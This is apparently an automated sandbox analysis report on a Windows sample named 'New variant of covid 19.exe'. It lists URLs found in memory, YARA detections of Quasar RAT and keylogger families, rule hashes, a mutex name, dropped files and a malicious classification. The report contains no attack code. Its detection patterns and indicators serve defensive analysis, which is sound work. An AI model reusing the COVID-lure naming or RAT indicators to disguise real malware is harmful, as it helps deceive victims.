      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://scripts.webcontentassessor.com/scripts/5550ca64f1c03fa16b2d1f2d6508b85a6de49bc25b57292ba9c7c
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 0000001B.00000003.310135786.0000022377245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 0000001B.00000003.310135786.0000022377245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 0000001B.00000003.309882014.000002237724E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: New variant of covid 19.exe, 00000000.00000003.207848034.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/

      E-Banking Fraud:

      barindex
      Yara detected Quasar RATShow sources
      Source: Yara matchFile source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
      Source: Yara matchFile source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_02E1F090
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_02E1F960
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_02E1ED48
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06ADD600
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06AD7350
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06AD3EBC
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeCode function: 39_2_00373F1E
      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956
      Source: New variant of covid 19.exeStatic PE information: invalid certificate
      Source: New variant of covid 19.exe, 00000000.00000000.194712766.0000000000F22000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYNcegbh OAaEntXrDdbrC.exeL vs New variant of covid 19.exe
      Source: New variant of covid 19.exeBinary or memory string: OriginalFilename vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.739768531.00000000010F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.739097060.000000000045A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameXCzM BeF.exe2 vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.739179364.0000000000CD2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYNcegbh OAaEntXrDdbrC.exeL vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs New variant of covid 19.exe
      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
      Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.evad.winEXE@48/29@47/5
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile created: C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYSJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeMutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0rTOWP1Cp29BLnKtOI
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6372
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_01
